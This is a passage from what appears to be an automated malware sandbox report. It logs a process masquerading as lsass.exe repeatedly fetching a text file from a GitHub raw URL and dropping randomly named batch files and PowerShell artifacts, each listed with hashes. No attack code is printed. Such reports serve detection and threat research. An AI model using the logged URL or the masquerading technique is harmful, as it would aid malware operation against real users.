                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:01:29 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lon4260-LON
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1734814890.568216,VS0,VE1
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 7d9b5d31a08ccc28d6479947afe02cccc64267f0
                                        Expires: Sat, 21 Dec 2024 21:06:29 GMT
                                        Source-Age: 56
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.110.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:01:44 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lon420118-LON
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1734814905.974573,VS0,VE1
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 562843d3fc8698b9f897f8508804e7372f6f8817
                                        Expires: Sat, 21 Dec 2024 21:06:44 GMT
                                        Source-Age: 71
                                      • flag-us
                                        DNS
                                        101.210.23.2.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        101.210.23.2.in-addr.arpa
                                        IN PTR
                                        Response
                                        101.210.23.2.in-addr.arpa
                                        IN PTR
                                        a2-23-210-101deploystaticakamaitechnologiescom
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.110.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:01:59 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lon4230-LON
                                        X-Cache: HIT
                                        X-Cache-Hits: 2
                                        X-Timer: S1734814919.005172,VS0,VE0
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 06471c01a1e5b801efaa966df6c46477ef781ae1
                                        Expires: Sat, 21 Dec 2024 21:06:59 GMT
                                        Source-Age: 85
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.110.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:02:08 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lcy-eglc8600022-LCY
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1734814929.646806,VS0,VE3
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: f43a06eec02e5723a47ad755efeff807a2dfcfef
                                        Expires: Sat, 21 Dec 2024 21:07:08 GMT
                                        Source-Age: 1
                                      • flag-us
                                        DNS
                                        22.236.111.52.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        22.236.111.52.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.110.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:02:19 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lon4246-LON
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1734814940.610200,VS0,VE1
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 7e3bf0512d6c9fbcf14c80e88ea7d1592fd53108
                                        Expires: Sat, 21 Dec 2024 21:07:19 GMT
                                        Source-Age: 106
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.110.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:02:33 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lcy-eglc8600032-LCY
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1734814953.003273,VS0,VE7
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 80fdfba9207cf7445e69b2e12b8ae5ddb3f5bc2f
                                        Expires: Sat, 21 Dec 2024 21:07:33 GMT
                                        Source-Age: 26
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.110.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:02:40 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lcy-eglc8600094-LCY
                                        X-Cache: HIT
                                        X-Cache-Hits: 2
                                        X-Timer: S1734814960.431711,VS0,VE0
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 4ae8438070b50cf3e98100716d3ae47703b2ee86
                                        Expires: Sat, 21 Dec 2024 21:07:40 GMT
                                        Source-Age: 33
                                      • flag-us
                                        DNS
                                        raw.githubusercontent.com
                                        lsass.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        raw.githubusercontent.com
                                        IN A
                                        Response
                                        raw.githubusercontent.com
                                        IN A
                                        185.199.111.133
                                        raw.githubusercontent.com
                                        IN A
                                        185.199.110.133
                                        raw.githubusercontent.com
                                        IN A
                                        185.199.109.133
                                        raw.githubusercontent.com
                                        IN A
                                        185.199.108.133
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.111.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:02:55 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lcy-eglc8600069-LCY
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1734814975.139552,VS0,VE2
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 8c17bee7566d67d13bfb7fbce26ae1a7d7b2254d
                                        Expires: Sat, 21 Dec 2024 21:07:55 GMT
                                        Source-Age: 48
                                      • flag-us
                                        DNS
                                        133.111.199.185.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        133.111.199.185.in-addr.arpa
                                        IN PTR
                                        Response
                                        133.111.199.185.in-addr.arpa
                                        IN PTR
                                        cdn-185-199-111-133githubcom
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.111.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:03:04 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lon420126-LON
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1734814985.588137,VS0,VE1
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 43de5f35ad6852ab3356d149e9571fa3a0bd6820
                                        Expires: Sat, 21 Dec 2024 21:08:04 GMT
                                        Source-Age: 151
                                      • flag-us
                                        DNS
                                        85.65.42.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        85.65.42.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • 185.199.110.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        896 B
                                        5.1kB
                                        8
                                        9

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.110.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        896 B
                                        5.1kB
                                        8
                                        10

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.110.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        861 B
                                        5.1kB
                                        8
                                        9

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.110.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        914 B
                                        5.1kB
                                        8
                                        9

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.110.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        861 B
                                        5.1kB
                                        8
                                        10

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.110.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        861 B
                                        5.1kB
                                        8
                                        10

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.110.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        914 B
                                        5.1kB
                                        8
                                        9

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.110.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        914 B
                                        5.1kB
                                        8
                                        9

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.110.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        914 B
                                        5.1kB
                                        8
                                        9

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.110.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        861 B
                                        5.1kB
                                        8
                                        9

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.111.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        994 B
                                        5.1kB
                                        9
                                        10

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 185.199.111.133:443
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        tls, http
                                        lsass.exe
                                        914 B
                                        5.1kB
                                        8
                                        9

                                        HTTP Request

                                        GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                        HTTP Response

                                        200
                                      • 8.8.8.8:53
                                        228.249.119.40.in-addr.arpa
                                        dns
                                        73 B
                                        159 B
                                        1
                                        1

                                        DNS Request

                                        228.249.119.40.in-addr.arpa

                                      • 8.8.8.8:53
                                        83.210.23.2.in-addr.arpa
                                        dns
                                        70 B
                                        133 B
                                        1
                                        1

                                        DNS Request

                                        83.210.23.2.in-addr.arpa

                                      • 8.8.8.8:53
                                        73.159.190.20.in-addr.arpa
                                        dns
                                        72 B
                                        158 B
                                        1
                                        1

                                        DNS Request

                                        73.159.190.20.in-addr.arpa

                                      • 8.8.8.8:53
                                        95.221.229.192.in-addr.arpa
                                        dns
                                        73 B
                                        144 B
                                        1
                                        1

                                        DNS Request

                                        95.221.229.192.in-addr.arpa

                                      • 8.8.8.8:53
                                        raw.githubusercontent.com
                                        dns
                                        lsass.exe
                                        71 B
                                        135 B
                                        1
                                        1

                                        DNS Request

                                        raw.githubusercontent.com

                                        DNS Response

                                        185.199.110.133
                                        185.199.108.133
                                        185.199.109.133
                                        185.199.111.133

                                      • 8.8.8.8:53
                                        133.110.199.185.in-addr.arpa
                                        dns
                                        74 B
                                        118 B
                                        1
                                        1

                                        DNS Request

                                        133.110.199.185.in-addr.arpa

                                      • 8.8.8.8:53
                                        13.86.106.20.in-addr.arpa
                                        dns
                                        71 B
                                        157 B
                                        1
                                        1

                                        DNS Request

                                        13.86.106.20.in-addr.arpa

                                      • 8.8.8.8:53
                                        50.23.12.20.in-addr.arpa
                                        dns
                                        140 B
                                        156 B
                                        2
                                        1

                                        DNS Request

                                        50.23.12.20.in-addr.arpa

                                        DNS Request

                                        50.23.12.20.in-addr.arpa

                                      • 8.8.8.8:53
                                        15.164.165.52.in-addr.arpa
                                        dns
                                        72 B
                                        146 B
                                        1
                                        1

                                        DNS Request

                                        15.164.165.52.in-addr.arpa

                                      • 8.8.8.8:53
                                        172.210.232.199.in-addr.arpa
                                        dns
                                        74 B
                                        128 B
                                        1
                                        1

                                        DNS Request

                                        172.210.232.199.in-addr.arpa

                                      • 8.8.8.8:53
                                        101.210.23.2.in-addr.arpa
                                        dns
                                        71 B
                                        135 B
                                        1
                                        1

                                        DNS Request

                                        101.210.23.2.in-addr.arpa

                                      • 8.8.8.8:53
                                        22.236.111.52.in-addr.arpa
                                        dns
                                        72 B
                                        158 B
                                        1
                                        1

                                        DNS Request

                                        22.236.111.52.in-addr.arpa

                                      • 8.8.8.8:53
                                        raw.githubusercontent.com
                                        dns
                                        lsass.exe
                                        71 B
                                        135 B
                                        1
                                        1

                                        DNS Request

                                        raw.githubusercontent.com

                                        DNS Response

                                        185.199.111.133
                                        185.199.110.133
                                        185.199.109.133
                                        185.199.108.133

                                      • 8.8.8.8:53
                                        133.111.199.185.in-addr.arpa
                                        dns
                                        74 B
                                        118 B
                                        1
                                        1

                                        DNS Request

                                        133.111.199.185.in-addr.arpa

                                      • 8.8.8.8:53
                                        85.65.42.20.in-addr.arpa
                                        dns
                                        70 B
                                        156 B
                                        1
                                        1

                                        DNS Request

                                        85.65.42.20.in-addr.arpa

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\lsass.exe.log

                                        Filesize

                                        1KB

                                        MD5

                                        baf55b95da4a601229647f25dad12878

                                        SHA1

                                        abc16954ebfd213733c4493fc1910164d825cac8

                                        SHA256

                                        ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                        SHA512

                                        24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                        Filesize

                                        2KB

                                        MD5

                                        d85ba6ff808d9e5444a4b369f5bc2730

                                        SHA1

                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                        SHA256

                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                        SHA512

                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        d28a889fd956d5cb3accfbaf1143eb6f

                                        SHA1

                                        157ba54b365341f8ff06707d996b3635da8446f7

                                        SHA256

                                        21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                        SHA512

                                        0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        2e907f77659a6601fcc408274894da2e

                                        SHA1

                                        9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                                        SHA256

                                        385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                                        SHA512

                                        34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                                      • C:\Users\Admin\AppData\Local\Temp\CxpWyGgMb4.bat

                                        Filesize

                                        192B

                                        MD5

                                        45abc89d2042037250f411dd3e0af20c

                                        SHA1

                                        a6e026d987ce0a7fc1419e0bc359880ae8ce120f

                                        SHA256

                                        58e144aa01731d662e527888ec3e69eb7972f6d36442de816ae0b617871b1164

                                        SHA512

                                        16bcb569928e1d4417780fadff20ea180ce7b0999d856898a1055de2d188b04c9f3030e6b2f8dbe232a41748f3952ab9486527ccef62909e6afae4e1956eff57

                                      • C:\Users\Admin\AppData\Local\Temp\EtrZeLjFvq.bat

                                        Filesize

                                        192B

                                        MD5

                                        51a256cc1c08245ce47ce0973ad3adf1

                                        SHA1

                                        15067d3a0696272bd6f21cbfbf71978d4bc864e2

                                        SHA256

                                        d6e15c84fea337fcceb17e024635badc211717069f3d19485cd02c241c16e919

                                        SHA512

                                        1ab55ab07a1ad83e63a890b68ae071a2d8629e21c019a269b6f33665a3d7ecedf2f865d93a2f0b45007342ebff3fdd4fa365fb3ec3c45a456a0c96fa0a5422f9

                                      • C:\Users\Admin\AppData\Local\Temp\RjWoOVK6wo.bat

                                        Filesize

                                        192B

                                        MD5

                                        49d4dc762057640dfcb0e04ba1e29a64

                                        SHA1

                                        d28c377473aa276bc8f24c58132855352557f488

                                        SHA256

                                        4b4d1fcd02207bcd490678c6864ced9fbe75911bac0051cad0d852fe5bb8d85b

                                        SHA512

                                        26323cbc6b2eb3f4cafadf99fd2a1a18273b6e38f3f07762219488acf370828bd169d584b199bda88e0134795cc1f9fb0fe09fe7bc62a14471d1e854297657b5

                                      • C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat

                                        Filesize

                                        192B

                                        MD5

                                        f5f2302b3b9a4939933ac18af6dc01f2

                                        SHA1

                                        71fa235603048fc66ec06c8545bee7afac7d5376

                                        SHA256

                                        b1f676ab43b822853aaf9150a15268ada95eead88a8b463ea787cae6aef448b3

                                        SHA512

                                        daf0ce2c1e5ffb1449d1cb640f1bf5de1b82c3247dd9cfea5df7e7035702bf25597cdac99c78aeebb8fba1987911a9f821ddaf60606439d688a8cddb42df3206

                                      • C:\Users\Admin\AppData\Local\Temp\UWQnaEvoMY.bat

                                        Filesize

                                        192B

                                        MD5

                                        22f286c6f761dd0b6a57f871c2d90ed3

                                        SHA1

                                        6a5e513e0190402cd4c018dbeb0b14c914774656

                                        SHA256

                                        f477d040544a721208c514a1693b993b876d437ac3d047664f73ecea04212458

                                        SHA512

                                        d7e97d5baff087a03aff2d85faa0bbf0099aa431e4ae3451f2f397e8f5cbbf6d7ace874377643f9fb8a20d7ed6578495d59dbd042106c5a1b939ad9dd8178a1a

                                      • C:\Users\Admin\AppData\Local\Temp\XdxpZ3I66P.bat

                                        Filesize

                                        192B

                                        MD5

                                        92f97ae8d732194d84e08fc0f3d0e16a

                                        SHA1

                                        dbed965b6a5e23d71bc1e12f22cc3a39c636f5f0

                                        SHA256

                                        7f245728e4fc399f193e1998fef0bcfa1c84901e8db0f117999e4d4d697fbef2

                                        SHA512

                                        447c9cc22a360aaa29f9a872b362b2ceba136390218650eea4306529e0023ac2b759102923647dfe32845fd8ea247502d3b313e982d7be8f813beae9a1817c1a

                                      • C:\Users\Admin\AppData\Local\Temp\Zi7wkUpBKE.bat

                                        Filesize

                                        192B

                                        MD5

                                        b3e91db14ab3eacd70ceb33482073b6e

                                        SHA1

                                        9fdff0a45716ed6835fefde104ca3295a05eea4a

                                        SHA256

                                        ca388a6491f9d151608194a1531f06e2d58eeb371ad2b31651bdfeae6b993eb4

                                        SHA512

                                        d5fd2cce3cda552f032c5fe511ce449e170acc8fec00958f9dd835388d04a42a9e2e23e4f9f1f79fd9bf3d997bb65588b92a0c48661ba9e94829bdd7e9b83b76

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fju41czc.mh0.ps1

                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      • C:\Users\Admin\AppData\Local\Temp\gWC6ojzqIZ.bat

                                        Filesize

                                        192B

                                        MD5

                                        e482ec13dbca9b92187af53256eba9a4

                                        SHA1

                                        47c1314c45c07afb3b4a10370410c5e12e655e11

                                        SHA256

                                        9182171ffeb7abb36b93709c4e168171b1093181158ceb72ce1abaa2cfeab929

                                        SHA512

                                        f1411b2c88776307ab08cb7535425446ccd2603771a0a2a03600efd4f907609042438571c73adc3b40a997d9f616480d005fac3aac3e722edeea23ac53112e4f

                                      • C:\Users\Admin\AppData\Local\Temp\nGW3UwTeX7.bat

                                        Filesize

